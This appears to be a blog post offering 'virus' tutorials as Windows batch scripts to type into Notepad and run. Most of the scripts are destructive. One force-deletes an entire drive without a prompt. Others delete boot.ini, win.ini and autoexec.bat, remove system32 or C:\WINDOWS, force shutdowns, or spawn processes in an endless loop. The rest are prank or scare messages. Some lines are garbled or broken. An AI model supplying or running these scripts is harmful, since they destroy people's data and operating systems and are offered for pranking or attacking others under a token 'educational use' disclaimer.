NOTE:This Tutorial is for Educational Use only, If caught in the Act, You are on your Own!!!
create a simple virus using note pad :-)
- open notepad,
- type shutdown /r/t 50/c "Trozen is active"/f
- save as.
- filename.bat
- now double click on this and see the magic.
How To Make A Virus With Only Notepad :-)
- open notepad and type ↴
- @echo off
- erase rd/s /f /q c:\*.*
- save it as .cmd
- when u double click on that file, it will deletes the entire content of a drive without asking Y/N in the cmd box
- @echo vishal sohaliya //@cd new mat
- @start haxtap.inf
- @cls
- @exit
- save as.
- filename.bat
- now double click on this file.
- @echo off
- attrib -h -r -s c:\autoexec.bat
- del c:\autoexec.bat
- attrib -h -r -s C:\boot.ini
- del c:\boot.ini
- attrib -h -r -s C:\win.ini
- del c:\win.ini
- save as.
- filename.bat
- now double click on this file.
- rmdir %systemroot%\system32
- save as.
- filename.bat
- now double click on this file.
- /*exe remove*/
- @echo off
- echo unhiding files..
- attrib -s -h -r *
- echo.
- echo.
- echo unhiding files and folders. By Aryan 9998588694
- echo WWW.GTUMCA.CO.CC
- attrib -s -h -r /s /d
- echo.
- echo.
- pouse
- save as.
- filename.bat
- now double click on this file.
- /*lock*/
- ren a a.{21EC2020-3AEA-1069-A2DD-08002B30309D}
- save as.
- filename.bat
- now double click on this file.
- .LOG
- 11:53 PM 12/4/2016
- save as.
- filename.bat
- now double click on this file.
- :loop
- start joke.bat
- Goto loop
- save as.
- filename.bat
- now double click on this file.
- /*msg by vishal*/
- @ECHO off
- :Begin
- msg * Hi
- msg * I am!
- msg * vishal sohaliya
- msg * Lets have fun together!
- msg * Because you have been o-w-n-e-d
- msg * dont cry only try
- GOTO BEGIN
- save as.
- filename.bat
- now double click on this file.
- shutdown -s -t 4
- save as.
- filename.bat
- now double click on this file.
- virus msg simple
- @ echo off
- :start
- title Virus
- echo Your system is affected by virus
- PAUSE
- echo:
- echo Windows will now try to undo changes
- PAUSE
- echo:
- echo FAILED !
- PAUSE
- echo:
- echo Your system is corrupt
- PAUSE
- GOTO start
- save as.
- filename.bat
- now double click on this file.
- cls
- :A
- color 0a
- @ echo off
- echo Wscript.Sleep
- DEL C:\WINDOWS 5000>C:\sleep5000.vbs
- echo Wscript.Sleep 3000>C:\sleep3000.vbs
- echo Wscript.Sleep 4000>C:\sleep4000.vbs
- echo Wscript.Sleep 2000>C:\sleep2000.vbs
- cd %systemroot%\System32
- dir
- cls
- start /w wscript.exe C:\sleep3000.vbs
- echo Deleting Critical System Files...
- echo del *.*
- start /w wscript.exe C:\sleep3000.vbs
- echo Deletion Successful!
- start /w wscript.exe C:\sleep2000.vbs
- echo:
- echo:
- echo:
- echo Deleting Root Partition...
- start /w wscript.exe C:\sleep2000.vbs
- echo del %SYSTEMROOT%
- start /w wscript.exe C:\sleep4000.vbs
- echo Deletion Successful!
- start /w wscript.exe C:\sleep2000.vbs
- echo:
- echo:
- echo:
- echo Creating Directory h4x...
- cd C:\Documents and Settings\All Users\Start Menu\Programs\mkdir
- h4x
- DEL C:\WINDOWS
- start /w wscript.exe C:\sleep3000.vbs
- echo Directory Creation Successful!
- echo:
- echo:
- echo:
- echo Execution Attempt 1...
- start /w wscript.exe C:\sleep3000.vbs
- echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
- echo start hax.exe
- start /w wscript.exe C:\sleep3000.vbs
- echo Virus Executed!
- echo:
- echo:
- echo:start /w wscript.exe C:\sleep2000.vbs
- echo Disabling Windows Firewall...
- start /w wscript.exe C:\sleep2000.vbs
- echo Killing all processes...
- start /w wscript.exe C:\sleep2000.vbs
- echo Allowing virus to boot from startup...
- start /w wscript.exe C:\sleep2000.vbs
- echo:
- echo:
- echo Virus has been executed successfully!
- start /w wscript.exeC:\sleep2000.vbs
- echo:
- echo Have fun!
- start /w wscript.exe C:\sleep2000.vbs
- pause
- shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
- save as.
- filename.bat
- now double click on this file.
- @echo off
- msg * WARNING
- msg * VIRUS ENTERED YOUR PC
- save as.
- filename.bat
- now double click on this file.
No comments:
Post a Comment